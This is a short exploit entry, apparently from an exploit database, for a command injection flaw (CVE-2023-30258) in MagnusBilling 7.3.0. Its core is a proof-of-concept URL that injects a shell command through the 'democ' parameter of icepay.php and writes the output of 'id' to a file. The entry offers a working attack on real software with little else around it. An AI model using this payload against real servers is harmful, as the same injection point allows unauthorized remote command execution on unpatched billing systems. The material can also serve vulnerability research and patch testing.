# Exploit Title: MagnusSolution magnusbilling 7.3.0 - Command Injection
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/magnussolution/magnusbilling7
# Software Link: https://github.com/magnussolution/magnusbilling7
# Version: 7.3.0
# Tested on: Centos
# CVE : CVE-2023-30258
# PoC URL for Command Injection
http://magnusbilling/lib/icepay/icepay.php?democ=testfile; id > /tmp/injected.txt
Result: This PoC attempts to inject the id command.
[Replace Your Domain Name]
